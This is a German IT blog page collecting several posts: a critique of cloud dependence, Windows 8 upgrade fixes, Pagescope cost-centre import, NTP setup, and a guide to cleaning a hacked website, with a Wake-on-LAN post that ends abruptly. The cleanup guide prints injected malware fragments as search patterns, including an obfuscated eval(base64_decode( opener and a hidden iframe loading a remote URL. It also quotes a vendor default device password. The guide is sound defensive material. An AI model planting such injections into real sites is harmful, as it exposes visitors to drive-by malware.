Cloud um jeden Preis?

- - Allgemein, IT, Web

Egal in welcher Branche man sich heute umhört – der Begriff “Cloud” und “Daten auslagern” ist allgegenwärtig. Es scheint die Lösung für alle Probleme zu sein – ohne Rücksicht auf Konsequenzen. Aber ist das wirklich so?

Die Nutzung einer Cloud ist selbstverständlich geworden. Egal ob Google, Dropbox, Microsoft oder wie sie sonst noch heissen – fast jeder lagert bei einem dieser grossen Anbieter einen Teil seiner Daten.

Cloud um jeden Preis?Der Grund dafür? Nun – Daten in der Cloud zu lagern ist einfach ungemein praktisch. Weder muss man sich um ein Backup kümmern, noch müssen die Daten in irgendeiner Form mit sich geführt werden. Selbst unterwegs hat man vollen Zugriff auf wichtige Informationen und kann diese nach Belieben mit allen teilen.

Hinzu  kommen die verhältnismässig geringen Kosten die bei den grossen Cloudanbietern teilweise sogar ganz entfallen.

Doch gibt es dabei keinen Haken? Keine Hintergedanken?

Alles hat seinen Preis

Alles hat seinen Preis, auch Dinge, von denen man sich einbildet, man kriegt sie geschenkt.

Jeder weiss es, nicht immer ist man sich dessen aber bewusst. (Nur) Nichts ist gratis.

Selbstverständlich bezahlt man beispielsweise für OpenSource Produkte die man kostenlos herunterladen kann nicht mit Geld – dafür aber mit Zeit, die man braucht um sich damit vertraut zu machen. Auch bei Demoversionen und Gratisproben bezahlen wir mit Zeit – die wir einsetzen um uns mit dem Produkt zu befassen.

Wo also liegt der Preis der Cloud?

In der Zeit? In den meisten Fällen nicht – den Cloudprodukte sind praktisch “idiotensicher” aufgebaut. Ein paar Klicks dort, ein paar Klicks da – und komplexe Vorgänge sind  plötzlich auch für Neueinsteiger möglich.

Für viele alltägliche Probleme finden sich heute findige Cloudprovider die eine Lösung anbieten – was darunter leidet ist das Verständnis und die Möglichkeit sich selbst weiterzuentwickeln.

All dies führt zu einer starken Abhängigkeit vom jeweiligen Anbieter. Man mag argumentieren, dass gerade im IT-Bereich immer eine Abhängigkeit von Systemen oder Produkten vorhanden ist – doch in der Cloud ist diese wesentlich stärker, da die Daten nicht nur technisch sondern auch räumlich vom Benutzer abgetrennt werden.

Ein Beispiel? Bei einer Serverlösung im Büro wissen Sie, dass Ihre Daten in Griffweite liegen. Bei einer Cloudlösung hingegen wissen Sie – …nichts.
Ihre Daten könnten theoretisch überall auf der Welt verteilt liegen, das Dokument XY liegt in einem Rechenzentrum in den USA, Video Y liegt auf einem Server in Deutschland…

Kurzum – wenn Sie totale Abhängigkeit suchen, in der Cloud werden Sie fündig!

Verblendung

Die monetären Kosten eine Cloudlösung versperren uns die Sicht auf den wahren Preis.

Es beginnt bereits im kleinen.
Sätze wie “Sichern Sie sich jetzt 5 GB kostenlosen Speicherplatz” oder “Lager Sie Ihre Daten jetzt sicher und kostenlos in der Cloud” klingen gut und verleiten uns, dieses Angebot gleich zu nutzen – denn was kann schon passieren?

Das wir dabei nicht nur unser Benutzerverhalten sondern auch unsere persönlichen Daten offenlegen spielt kurzfristig keine Rolle – denn das Angebot  ist ja einfach “zu gut”…

Dasselbe gilt für jede andere virtuelle Dienstleistung; E-Mail, Dokumentenbearbeitung, Musik- alles bekommt man heute in der Cloud – günstiger oder kostenlos und überall verfügbar!

Das Problem dabei, ist nicht einmal die Suche nach dem “günstigsten” (oder billigsten?) Anbieter, denn jeder hat das Recht für sich oder sein Unternehmen das günstigste Angebot zu wählen. Problematisch ist  ist die “Geiz-ist-geil” Mentalität; Wir fahren 20 km weiter, weil die Tankstelle dort das Benzin 2 Rappen günstiger anbietet. Wir bestellen Elektronikprodukte online aus China weils 30.- Franken günstiger kommt. Wir lagern Daten in der Cloud weils günstiger oder sogar kostenlos ist. Kurz – wir ordnen sämtliche Vor- und Nachteile den monetären Kosten unter – ohne Rücksicht auf langfristige Folgen.

Wir lassen uns vom Faktor Preis (ver)blenden – auf Kosten unserer Individualität und Unabhängigkeit.

Von Vordenkern und Mitläufern

Wer eine Cloudlösung verwendet, spielt nach den Regeln seines Anbieters. Alle Prozesse und Abläufe wurden vordefiniert – es gibt wenig Platz für eigene Anpassungen. Selbstverständlich lassen sich gewisse Punkte individualisieren (Logo, Texte) – aber immer nur bis zu einem gewissen Punkt. Jemand hat für Sie vorgedacht – jetzt müssen Sie mitlaufen.

Grundsätzlich ist die Idee eines vordefinierten Systems, dass sofort produktiv eingesetzt werden kann zwar absolut in Ordnung. Problematisch ist nur die Tatsache, dass dieses System sagt, was man wie tun muss. Die Notwendigkeit sich selbst mit einem Problem zu befassen entfällt fast vollständig – damit aber auch der Lerneffekt und die Chance individuelle Abläufe zu optimieren.

Macht die Cloud dumm?

Cloud_DenkenDie Frage ist heikel, muss aber dennoch gestellt werden. Wo wären wir heute, wenn die Menschheit immer nur vordefinierten Prozessen gefolgt wäre? Nur “fixfertige” Produkte eingekauft hätte? Grundlegende Fragen einfach übergangen worden wären, weil die Lösung ja bereits da ist?

Wohin kommen wir, wenn die Antwort auf jede Frage nur noch lautet “die Cloud”?

Wo sind meine persönlichen Finanzdaten? In der Cloud.
Wo ist mein Erspartes? In der Cloud.
Woher erfahre ich, welches Wetter morgen ist? Aus der Cloud.
Woher erfahre ich den schnellsten Weg nach Zürich? Aus der Cloud.

Selbstverständlich ist die Cloud nicht durch und durch schlecht. Im Gegenteil. In gesundem Masse kann sie tatsächlich Dinge vereinfachen und Kosten senken. Doch genau dieses Mass findet bei weitem nicht jeder – inbesondere da “die Cloud” immer mehr zum Statussymbol avanciert und Personen ohne Cloudnutzung als altmodisch oder ängstlich abstempelt.

Die Cloud kann “dumm machen” indem uns komplexe Vorgänge als absolut simpel verkauft werden. Wir reichen ein Problem ein und erhalten die Lösung – wo, wie und womit diese aber entstanden ist bleibt  unverständlich.  Die Cloud denkt für uns und löst unsere Probleme, nimmt uns dabei aber auch die Gelegenheit uns selbst weiterzuentwickeln und neue Lösungswege zu finden.

Macht die Cloud abhängig?

Auf jeden Fall. Je komplexer die Cloudlösung, desto komplizierter ist der Zugriff auf Rohdaten. Bei reinen Speicherlösungen wie Dropbox, Google Drive oder Backup in der Cloud ist der Zugriff und der Erhalt von Daten noch relativ problemlos möglich. Werden hingegen ganze Systeme wie Server oder virtuelle Arbeitsplätze in der Cloud hinterlegt ist ohne Zustimmung des Anbieters oftmals nur ein teilweiser Zugriff möglich. Eine schnelle Möglichkeit den Anbieter zu wechseln gibt es dann nicht mehr – selbst der Export von simplen Datensätzen kann zu einer Herkulesaufgabe werden.

Bei jeder Entscheidung für eine Erweiterung oder Ergänzung des  System muss der Anbieter miteinbezogen werden. Kann z.B. mit einer physischen Infrakstruktur, die im Büro steht recht einfach ein Benutzer oder Gerät hinzugefügt werden, fehlen Ihnen bei einer in der Cloud hinterlegten Lösung dazu meist die Berechtigungen. Sie müssen zuerst nachfragen, ob das möglich ist bzw. was das zusätzlich kostet – und sind damit wiederum abhängig vom Anbieter.

Ist die Cloud sicher?

Sicherheit wird immer wichtiger – insbesondere wenn theoretisch jeder auf die Clouddaten zugreifen kann. In diesem Punkt müssen Sie sich aber auf Ihren Cloudanbieter verlassen – Sie haben wenig Möglichkeiten die Sicherheit zu überprüfen geschweige denn zu erhöhen. Sie spielen nach den Regeln Ihres Cloudproviders und müssen sich danach richten.

Auch der gern und oft erwähnte Standortvorteil Schweiz ist kein Garant für Sicherheit. Zwar mag dadurch eine gewisse rechtliche Sicherheit gegeben sein – wie stark sich ausländische Geheimdienste aber um das Recht in der Schweiz bzw. in Europa scheren dürfte aber hinlänglich bekannt sein. Da jede Cloudlösung auch immer einen Teil  Soft- oder Hardware “Made in USA” beeinhaltet, lässt sich auch die Gefahr für mögliche Hintertürchen nicht vollständig ausschliessen. Kurz – es ist eine Illusion zu glauben, nur weil eine Lösung in Europa gehostet wird,  sei man gegen Datenschnüffelei vollständig geschützt.

Dass Sicherheit gerade im Web schnell zum Problem werden kann, zeigt auch die aktuelle Sicherheitslücke “Heartbleed”. Zwar kann sie auch lokale Installationen betreffen, der Schwerpunkt wird aber bei Cloudlösungen liegen. Welche Schäden dadurch entstanden sind wird sich erst langfristig zeigen.

Weg ohne Wiederkehr?

Die Cloud ist nicht ohne Grund nach einer Wolke benannt. Zwar hat man jederzeit Zugriff auf seine Daten, auf welchem physischen Medium diese Daten dann schlussendlich aber lagern kann oft gar nicht oder nur schwer festgestellt werden – alles liegt im “Nebel der Cloud“.
Zugegeben – dies mag für Urlaubsbilder oder private Mails keine grosse Rolle spielen.  Sobald  aber sensible Informationen wie Passwörter, persönliche Informationen oder Geschäftsdaten gespeichert werden, ist die Frage in welchen Teilen der Welt diese Daten denn nun kursieren, sicherlich berechtigt.

Da der Weg der Daten bei Cloudlösungen nicht immer nachvollzogen werden kann, ist auch die Enfernung derselben immer mit einem gewissen Risiko behaftet. Anders ausgedrückt – was einmal in der Cloud liegt ist nur sehr schwer wieder zu entfernen.

Relativierung

Den Preis der Cloud lässt sich nicht monetär beziffern. Wir bezahlen nicht nur mit Geld sondern auch mit nur schwer messbaren Werten wie Abhängigkeit, Persönlichen Informationen und Verlust von Selbständigkeit. Gleichzeitig ist die Cloud aber auch nicht durch und durch schlecht – in vernünftigem Masse verwendet, kann sie durchaus nützlich sein und den Alltag erleichtern.

Wie so oft gibt es nicht nur schwarz und weiss (Cloud vs. Offline) sondern auch grau – z.B. in Form einer privaten Cloud oder einer simplen VPN-Lösung. Alternativen zur Cloud insbesondere im Geschäftsbereich gibt es zu Genüge – sofern man denn dem Cloud-Hype widerstehen kann…

Error: Windows Cannot Be Installed to This Disk

- - Snippets

Bei der Installation oder dem Upgrade auf Windows 8 wird die Meldung “Error: Windows Cannot Be Installed to This Disk. The Selected Disk Has an MBR Partition Table. On EFI Systems, Windows Can Only Be Installed to GPT.” angezeigt. Wie man Windows trotzdem installieren kann – hier die Lösung.

Die Fehlermeldung kann bei allen Systemen auftreten. Wie so oft, ist der Hinweis auf die Lösung aber bereits in der Meldung enthalten.

Lösung

Die Installation darf nicht über EFI / UEFI durchgeführt werden – dazu gibt es zwei Möglichkeiten.

Variante 1

Je nach BIOS lässt sich das Bootmedium beim Start tempörar auswählen (meist F9 – kann varieren). Hier muss nun einfach das entsprechende Bootmedium ohne EFI / UEFI ausgewählt werden.

Variante 2

Wo eine direkte Auswahl des Bootmediums nicht möglich ist, muss das ganze über eine temporäre Umstellung der Bootreihenfolge geregelt werde. Dazu beim Start direkt ins BIOS navigieren und die Bootreihenfolge so anpassen, dass EFI / UEFI Einträge erst am Schluss kommen oder diese direkt deaktivieren.

Die Installation sollte sowohl bei Variante 1 wie auch 2 anschliessend problemlos durchführbar sein.

Upgrade auf Windows 8.1 schlägt fehl

- - IT, Snippets

Das kostenlose Upgrade von Windows 8 auf Windows 8.1 ist grundsätzlich eine gute Sache – sofern es denn durchgeführt werden kann. Wie man trotz Fehlermeldungen oder kleineren Hängern sein System auf  Version 8.1 upgraden kann – hier die Lösungen.

Ein Upgrade von Windows 8 ist leider nur über den Windows Store möglich. Wenn gleich bei einem reibungslosen Ablauf so vieles vereinfacht wird, erschwert es doch bei Fehlern das Finden einer Lösung. Eine alternative Upgrademöglichkeit wäre für ein nächste Mal wünschenswert…

Häufige Fehler beim Upgrade

  • Error Code 0×80070003
  • Error Code 0xC1900101-0×20017
  • Upgrade “hängt” ab 50 %

 

Lösungen

Windows Store Cache leeren

Da das Upgrade über den Windows Store durchgeführt wird, lohnt es sich bei Problemen hier anzusetzten. Eine erste Idee ist deshalb, den “Zwischenspeicher” des Stores zu leeren.Store Cache zurücksetzen

  1. “Windowstaste + R” drücken; Es öffnet sich das Fenster “Ausführen”
  2. “wsreset” eingeben (ohne Anführungszeichen); mit Enter bestätigen

 

 Windows Update Fehlerbehebung

Da evtl. ein fehlgeschlagenes Update das Upgrade verhindert, sollte diese Fehlerquelle bereits am Anfang ausgeschlossen werden. Glücklicherweise muss man dies nicht manuell erledigen – sondern kann folgendes Tool verwenden:  Windows Update Diagnostic

Das Tool einfach herunterladen, ausführen und mögliche Fehler beheben lassen.

Dienste überprüfen

Bei einigen Systemen scheint der Fehler bei einem fehlerhaften Eintrag in der Registry zu liegen.Registrierungs-Editor

  1. “Windowstaste + R” drücken; Das bereits bekannte Fenster “Ausführen” öffnet sich
  2. “regedit” eingeben (wiederum ohne Anführungszeichen); mit Enter bestätigen
  3. In der Baumstruktur zu folgendem Pfad navigieren:  HKEYLOCALMACHINE\SYSTEM\CurrentControlSet\Services\Schedule
  4. Korrekter Wert für StartHier nun den Eintrag “Start” mittels Doppelklick überprüfen. Es sollte der Wert “2″ vorhanden sein. Ansonsten mit “2″ überschreiben.
  5. Anschliessend einen Neustart durchführen und das Upgrade wiederholen.

 

 

 

Hinweise

  • Windows 8 Enterprise kann nicht über den Store aktualisiert werden (mehr dazu hier)
  • Evtl. installierte Zusatzprogramme wie Firewall, Antivirus etc. während dem Upgrade deaktivieren!

Kostenstellen importieren mit PAGESCOPE (Konica Minolta)

- - Tutorials

Drucker / Kopierer mit Kostenstellen sind mehr als nützlich. Sie erlauben die exakte Zuweisung und Verrechnung von Druckkosten an Kunden. Die Pflege der Kostenstellen erweist sich dann aber meist als mühsam – denn wer gibt schon gerne ellenlange Listen auf den suboptimalen Druckertasten ein?

Die Idee

Die Idee einer Kostenstelle ist schnell erklärt. Für jeden Auftrag, Prozess und/oder Kunde druckt man auf eine vorgegebene Nummer. Nach Abschluss der Arbeiten kann dann eine Liste mit den entsprechenden Kopien ausgedruckt und verrechnet werden. Neben der Übersicht und Kostentransparenz erhält man dadurch interessante Werte für die Kalkulation (Jährliche Druckkosten, Drucke/Kunde,…).

Das Problem

Zwar können die Kostenstellen meistens direkt am Kopierer/Drucker angepasst werden, das Eintippen auf den “kleinen Tasten” erweist sich aber meist als mühsam.

Bei neueren Kopierern besteht zwar die Möglichkeit, Kostenstellen per Weboberfläche anzupassen, doch auch das ist nicht immer ideal. Manuelles “Eintippen” von mehr als 10 Kostenstellen ist mühsam, zeitaufwändig und fehleranfällig.

Eine bessere Lösung muss her!

Pagescope?

Die von Konica Minolta angebotene Lösung für das Problem heisst Pagescope und ist zum grössten Teil kostenlos. Von der Verwaltung eines einzelnen Kopierers bis hin zur Administration von Dutzenden von Geräten kann eigentlich alles damit erledigt werden – ideal also für eine zentrale Verwaltung.

Hinweis: Für grössere Projekte empfiehlt sich die Intranetapplikation “Pagescope Net Care Device Manager”. Bei kleineren Projekten bzw. sporadischem Gebrauch ist man mit “Pagescope Data Administrator” wesentlich besser bedient.

Eine Übersicht bzw. Download der entsprechenden Tools findet man hier.

Benötigte Daten aufbereiten

Die benötigten Daten (Kostenstellen) sind meistens bereits in irgendeiner Form vorhanden. Ob nun etwa in Form von Kundennummer und Kunde oder aber bereits als Auftragsliste mit der dazugehörigen Auftragsnummer, das Prinzip ist immer das Gleiche:
Nummer (Kostenstelle)  –> Name

CSV Trennzeichen getrenntDiese Daten müssen als csv. – File aufbereitet werden wofür sich Microsoft Excel hervorragend eignet. Beim Export der Daten einfach darauf achten, dass der Dateityp “CSV (Trennzeichen getrennt)” ausgewählt ist.

 

Hinweis: Da auf den jeweiligen Geräten der Display meist begrenzt ist, sollten auch die Kostenstellennamen kurz gehalten werden. Bei Pagescope sind diese auf max. 20 Stellen begrenzt.

Pagescope installieren

Die Software Pagescope eignet sich für Kopierer von Konica Minolta. Allerdings bieten auch andere Hersteller ähnliche Tools an; der Ablauf ist dabei immer ähnlich und basiert auf den selben Grundlagen.

Die Installation von Pagescope ist daher auch nicht weiter schwierig – benötigte Zusatzpakete (“Device Manager”) werden automatisch installiert, den Rest erledigt der Assistent.

Kostenstellen importieren

PAGESCOPE KostenstellenpflegeIn Pagescope selbst erreicht man über die “Kostenstellenpflege” die relevanten Optionen für einen sauberen Import. Man sollte auf jeden Fall das entsprechende Gerätepasswort bereithalten (Standardpasswort Konica Minolta: 12345678), da nur dadurch ein Zugriff auf den Kopierer möglich ist.

 

Pagescope KostenstellenmethodeAuch hier erledigt wiederum der Assistent einen grossen Teil der Arbeit. Einziger Knackpunkt ist der Entscheid über die Kostenstellenmethode bzw. deren Authentifizierung. Wer Druck / Kopieraufträge lediglich sauber zuordnen möchte ist mit der (einfacheren) Methode (Authentifizierung ausschliesslich über Kontokennwort) besser bedient.

 

 

Pagescope Import aus einer DateiAnschliessend liest Pagescope die aktuellen Kostenstellen (falls vorhanden) aus. Hier besteht auch die Möglichkeit veraltete Einträge einfach und schnell zu löschen bzw. zu bearbeiten.

 

 

 

Pagescope Import aus einer DateiIn diesem Fenster kann man (endlich?) das vorbereitete csv. – File importieren. Der Vorgang ist an sich selbsterklärend; File importieren, entsprechende Spalten zuordnen, überprüfen und bestätigen. Sollten beim Import Fehler auftreten liegt das entweder an einem falschen Gerätepasswort, falschem Dateityp (.csv?) oder zu langen Kostenstellennamen.

 

Abschliessende Überlegungen

Tools wie Pagescope ermöglichen neben dem einfachen Import/Export von Kostenstellen auch die Delegation der Kostenstellenpflege an Mitarbeiter. Nach der Grundeinrichtung erfolgt die Verwaltung verhältnismässig einfach und Kostenstellen können direkt und zeitnah aktualisiert werden. Wer mehr als einen Kopierer mit denselben Kostenstellen verwendet kann auf einen Schlag sämtliche Daten bearbeiten – ideal!

NTP korrekt konfigurieren

- - Tutorials

Zeit ist relativ – dem einen kann es nicht schnell genug gehen, der andere möchte sie anhalten. Für IT – Systeme hingegen sollte man sich darauf verlassen können, dass die Zeit stimmt und überall gleich ist – sonst können unangenehme Überaschungen passieren…

NTP – klein aber fein

Das Network Time Protocol ( NTP) ist ein Standard um die Zeit auf verschiedenen IT-Systemen zu synchronsieren. Computer, Server, Router, SAN, NAS – alles kann via NTP auf die gleiche Zeit abgestimmt werden.  NTP funktioniert über das Protokoll UDP und ist damit universell einsetzbar.

Wieso braucht es eine Zeitsynchronisierung?

Auf den ersten Blick mag es unerheblich scheinen, dass beispielsweise ein Router, PC oder Server kleine Zeitdifferenzen aufweisen. Und was sollen Unterschiede von 1-2 Minuten denn schon gross ausmachen…oder?

Je nach System sind es aber gerade diese Differenzen, die für kleinere Timeouts bis zum kompletten Versagen führen. Ein Hauptgrund für die Wichtigkeit der Zeit in IT – Systemen ist schlichtweg, dass praktisch alles darauf basiert. Einige Beispiele:

  • Backup (zeitgesteuert)
  • Verschlüsselung
  • DHCP (bis wann ist eine Adresse gültig?)
  • Updates
  • Sicherheitsfunktionen (z.B. zweistufige Authentifizierung)

Insbesondere der Bereich Netzwerk setzt eine Zeitsynchronität voraus – falls diese nicht  gegeben ist, wird sich das früher oder später bemerkbar machen.

NTP Server

Ein NTP Server macht nichts anderes, als dass er “die Zeit verteilt”. Er bringt verbundene Geräte auf den korrekte Zeitstand. Dabei spielt es grundsätzlich keine Rolle ob die Zeit, die er verteilt auch korrekt ist. Solange sie im System synchron (d.h. alle gleich) ist, sollte alles funktionieren. Natürlich ist es aber ein Unsinn, falsche Werte zu  synchronisieren.  Deswegen bezieht ein NTP Server die Zeit meistens von einem “Master” NTP Server (siehe www.pool.ntp.org)

InternetzeiteinstellungenBei einzelnen Arbeitsstationen die direkt am Internet hängen, wird die Zeit standardmässig direkt mit einem Internetzeitserver konfiguriert. Dazu einfach in die Einstellungen für “Datum und Uhrzeit” gehen und nach einem Punkt “Internetzeit”  suchen.

 

Bei Domänennetzwerken wird die Sache schon interessanter. Generell wird hier die Zeit vom ersten Domänencontroller einer Gesamtstruktur übernommen. Dieser wiederum bezieht seine Zeit von der BIOS – Systemuhr. Um nun aber die Zeit mit einem exakten, externen Zeitserver zu synchronisieren reichen einige Zeilen Powershell.  Für Server 2012 lauten diese z.B:

w32tm /config /manualpeerlist:pool.ntp.org /syncfromflags:MANUAL
Stop-Service w32time
Start-Service w32time

Im ersten Schritt wird dem DC mitgeteilt woher er seine Zeit beziehen soll (in diesem Fall von pool.ntp.org). Danach wird der Service mittels Stop / Start neu gestartet.

Hinweis: In einer virtualisierten Umgebung sollte man vorher unbedingt die Zeitsychronisierung mit dem Host deaktivieren.

Nun muss die korrekt Zeit noch mit den einzelnen Domänenclients synchronisiert werden. Dazu eignet sich bspw. DHCP.

Zeit per DHCP verteilen

Unter Server 2012 findet sich die Funktion bei “DHCP” > “IPv4″ und/oder “IPv6″ > “Serveroptionen”. Dort den Haken bei “004 Zeitserver” setzten und den entsprechenden NTP Server (in diesem Beispiel der DC)  angeben.

Damit wird die korrekte Zeit automatisch synchronsiert – d.h. sämtliche Geräte die per DHCP ihre IP-Adresse beziehen und in die Domäne eingebunden sind, beziehen die Zeit per sofort vom DC.

Webseite gehackt – Was nun?

- - Tutorials

Dass grosse Webseiten gehackt werden ist bekannt. Doch was passiert wenn die eigene Webseite plötzlich ungebetene Gäste hat? Woher kommen sie? Und wie verhindert man das Schlimmste?

Betroffene Systeme

Sollten Sie nur statische HTML Seiten als Grundlage für Ihre Webseite verwenden (erkennbar an der Endung einzelner Seiten, z.B. meineseite.ch/kontakt.html) besteht ein geringes Risiko, dass Sie gehackt werden. Sobald Sie aber mit dynamischen Seiten, also z.B. CMS-Lösungen wie WordPress, Joomla etc. arbeiten und im Hintergrund eine Datenbank liegt besteht ein erhöhtes Risiko, dass Sie einem Hackerangriff zum Opfer fallen.

Die Aussage, dass verbreitete CMS-Lösungen verwundbarer als Einzellösungen sind ist aber dennoch nicht richtig. Zwar sind häufig verwendete CMS-Systeme interessanter für Angreifer, andererseits werden Lücken und Fehler auch wesentlich schneller bemerkt und geschlossen. Sofern Ihr CMS entsprechend gewartet und aktualisiert wird reduziert sich das Risiko daher erheblich.

Riskofaktoren

Passwörter

Die übliche Sicherheitslücke gilt auch für Webseiten. Verwenden Sie sichere Passwörter – lang und kompliziert ;) Als Alternative dazu eignet sich eine zweistufige Authentifzierung wie sie es vielleicht vom E-Banking her kennen. Google bietet dazu mit dem Google Authenticator eine interessante Lösung.

Plugins und Erweiterungen

Sobald ein System durch fremde Erweiterungen ergänzt wird steigt die Gefahr einer Sicherheitslücke. Verwenden Sie nur aktuelle Erweiterungen die regelmässig aktualisiert werden und sauber aufgebaut sind. Hier lohnt sich auch einen Blick auf kostenpflichtige Plugins zu werfen – Sie können sich damit eine Menge Ärger ersparen.

Themes und Designs

Wenn Sie Themes oder Designs für Ihr CMS aus dem Web beziehen, achten Sie auf die Quelle. Sie finden viele kostenpflichtige Themes “kostenlos” im Netz – leider installieren Sie damit aber manchmal nicht nur das Design sondern auch noch ein Hintertürchen. Auch hier gilt – ein Blick auf kostenpflichtige Themes lohnt sich!

Webhoster

Webhoster gibt es mittlerweile wie Sand am Meer. Ein grosser Teil davon sind sogenannte Reseller, d.h. sie kaufen ein Hostingprodukt ein und verkaufen es weiter. Nicht immer sind die entsprechenden Reseller aber auch zuverlässig oder mit den Gefahren des Webs vertraut. Achten Sie deshalb nicht immer nur auf den Preis, sonder vor allem ob der Hoster wirklich sein eigenes Hosting betreibt und weiss was er tut.

Kenne deinen Feind

Bereits Sunzi wusste; Kenne deinen Feind! Daher ist immer auch die Identifikation der “Hacker” ein Ziel. Glücklicherweise sind die meisten Attacken “Massenware”, d.h. sie werden nicht gezielt gegen eine Webseite gerichtet sondern gegen alle angreifbaren. Die Tools dazu werden entweder in entsprechenden Foren gekauft oder selbst erstellt.

Hack for money

Malware Webseite

Gehackte Webseiten mit Schadcode werden relativ rasch gesperrt – leider auch für potentielle Kunden oder Besucher…

Um es kurz zu machen – diese Angreifer möchten früher oder später Geld verdienen. Dementsprechend leiten Sie Ihre Besucher entweder um oder laden im Hintergrund Schadsoftware auf die Besucherrechner. Um den Profit zu maximieren laufen diese  Angriffe automatisiert ab, da sich diese Masche nur in grossen Mengen auszahlt (wenn überhaupt…). Dabei werden häufig .php-Files Ihrer Webseite verändert mit der Folge dass die ursprüngliche Webseite entweder gar nicht mehr oder nur noch eingeschränkt funktioniert.

Hack for prestige

Hack for prestige

Anders als beim obigen Beispiel bekennt sich hier eine Gruppe zum Angriff

Mittlerweile gibt es im Web Ranglisten für Gruppen welche die meisten Webseiten infiltriert haben. Der einzige Zweck eines solchen Angriffs ist demnach – Prestige! Obwohl für Besucher keine direkte Gefahr droht, wird auch hier die Webseite verändert um “zu beweisen” dass sie gehackt wurde – selbstverständlich immer mit einigen Bemerkungen der jeweiligen Gruppe. Im Beispiel links wird netterweise sogar erwähnt wie die Seite in den “Originalzustand” zurück versetzt werden kann.

Website desinfizieren

Da die gehackte Webseite in den meisten Fällen nicht mehr öffentlich zugänglich ist bzw. nur noch teilweise funktioniert, muss die Desinfektion auf einer anderen Ebene erfolgen – per FTP.

Zugang per FTP verschaffen

Wie man sich Zugang per FTP verschafft wird vielen bekannt sein. Falls nicht – einfach Filezilla herunterladen und mit den entsprechenden Benutzerdaten einloggen. Diese finden sich auf dem Datenblatt des Hosters.

Webseite per FTP desinfiszieren

Sobald die FTP-Verbindung steht, sollte man sich zuerst einen Überblick über die Ordnerstruktur verschaffen. Häufig befinden sich die für uns relevanten Daten im Ordner “httpdocs”. Neben einigen Unterordnern sollte dort auch eine Datei “index.php” vorhanden sein. Diese einfach mittels Drag&Drop auf den Desktop kopieren und mit einem Texteditor öffnen (Tipp: Notepad ++ eignet sich hervorragend dafür).

 

 

 Schadcode identifizieren

Nun folgt die eigentliche Suche nach dem Schadcode. Irgendwo im Code, häufig aber direkt am Anfang des .php – Files finden sich Zeilen, die einfach nicht so recht hineinpassen wollen. Einige beginnen beispielsweise so:

<script type="text/javascript">// <![CDATA[var
eval(base64_decode(
<iframe src="http://efwel.pro/7dfs32s/" height="1" width="1" frameborder="0" scrolling="no">

Das der Schadcode nicht direkt sichtbar ist sondern verschleiert wird ergibt sich aus dem Zusammenhang – der Angreifer möchte möglichst wenig Spuren hinterlassen. So liegen dann auch die eingebundenen Schadcodeteile meist auf gekaperten Servern – und niemals direkt beim Täter.

Wem die Suche nach “verdächtigem Code” zu mühsam ist, kann selbstverständlich auch mit Originaldateien vergleichen.

Schadcode entfernen

Da in den wenigsten Fällen nur ein File betroffen ist, müssen wir sämtliche Dateien überprüfen. Dazu setzen wir sämtliche Schritte zusammen:

  1. Schadcode entfernenDownload der gesamten Webseite via FTP (siehe Zugang per FTP)
  2. Identifizierten Schadcode in die Zwischenablage kopieren (siehe Schadcode identifizieren)
  3. Notepad ++ öffnen. Unter “Suchen” in “Dateien suchen” das komplette, heruntergeladene Verzeichnis nach dem Schadcode durchsuchen (Bild A)
  4. Falls mehrere Ergebnisse gefunden werden können  im selben Fenster mit “Ersetzen durch” sämtliche Einträge gelöscht werden (Bild B).
  5. Abschliessend sollten die Dateien noch mit einem Antivirus bspw. Kaspersky gescannt werden (Findet manchmal noch Einträge…)

Hinweise

Es gibt keine Garantie, dass wirklich sämtlicher Schadcode entfernt wurde. Wer auf Nummer sicher gehen will, sollte sämtliche Files durch Originaldateien ersetzen und die Datenbank neu anbinden. Eventuell vorgenommene Modifikation an Design / CMS gehen dabei verloren. Wer über ein Backup verfügt sollte zuallererst dieses einspielen…

Um festzustellen, ob auch andere Webseiten auf demselben Hoster vom Hack betroffen sind lohnt sich ein Blick auf http://www.yougetsignal.com/tools/web-sites-on-web-server/. Dadurch kann man das Ausmass etwa abschätzen und weitere Schritte planen (z.B. Hoster informieren/wechseln)

Wer gerne den Schadcode etwas genauer analysieren möchte kann dazu diverse Onlinetools (z.B. http://www.unphp.net/) verwenden. Diese “entschlüsseln” den Code mehr oder weniger schlecht…

Wenn die Webseite erneut gehackt wird, sollten die Risikofaktoren auf jeden Fall erneut überprüft werden

KMU und “Wake on LAN”

- - Tutorials

Gerade bei KMU’s ist es häufig so, dass die Arbeitsplätze häufig stark ausgelastet sind. Die Mitarbeiter kommen am morgen, lassen den Computer den ganzen Tag an und fahren in am Abend wieder herunter. Updates und Wartungsarbeiten während der Arbeitszeit automatisch durchzuführen ist zwar möglich aber meist ungeeignet. Die optimale Lösung? Wake on LAN!

Wake on LAN?

Selten wurde ein IT-Begriff so treffend gewählt wie Wake on LAN, auf deutsch “Wecken per Lokalem Netzwerk”. Genau das passiert nämlich: Ein ausgeschalteter Computer startet aufgrund eines Signals der Netzwerkkarte. Voraussetzung dafür ist aber:

  • Kompatible Netzwerkkarte (APM/ACPI Support)
  • Sauber strukturiertes LAN
  • Software (z.B. WOL2) oder entsprechender Router (z.B. DD-WRT)

Vereinfacht sollte eigentlich jeder Computer ab ca. 2008 über eine entsprechende Netzwerkkarte verfügen. Falls nicht bekannt, einfach kurz im BIOS überprüfen bzw. aktivieren.

Anwendungsbeispiele

Mögliche Anwendungen gibt es unzählige. Hier einige (sinnvolle) Beispiele:

  • Arbeitsstationen “präventiv” hochfahren, d.h. falls Arbeitsbeginn um 7.30 Uhr um 7.20 sämtliche Stationen hochfahren
  • Updates über Nacht einspielen
  • Schadcodescan über Nacht
  • Als Ergänzung zur Fernwartung
  • Energiemanagement (v.a. im Zusammenhang mit Virtualisierung). Server nur bei “Bedarf” aktivieren.

Eine “elegante” WOL Lösung mit Kaspersky

Kaspersky bietet mit dem Administrationsclient bzw. dem Security Center eine eingebaute “Wake on LAN” – Lösung. Damit können für einzelne Gruppen oder Arbeitsstationen wiederkehrende Aufgaben erstellt werden die dann vollkommen automatisch ausgeführt werden. Diese Lösung ist “elegant” weil keinerlei Zusatzsoftware benötigt wird sondern vorhandene Ressourcen (besser) genutzt  werden.

Ziel der Übung

Die Arbeitsstationen sollen um 1 Uhr nachts automatisch gestartet werden, ein Schadcodescan durchgeführt und sämtliche Updates eingespielt werden. Danach sollen die Computer wieder heruntergefahren werden.

Aufgabe in Kaspersky Security Center erstellen

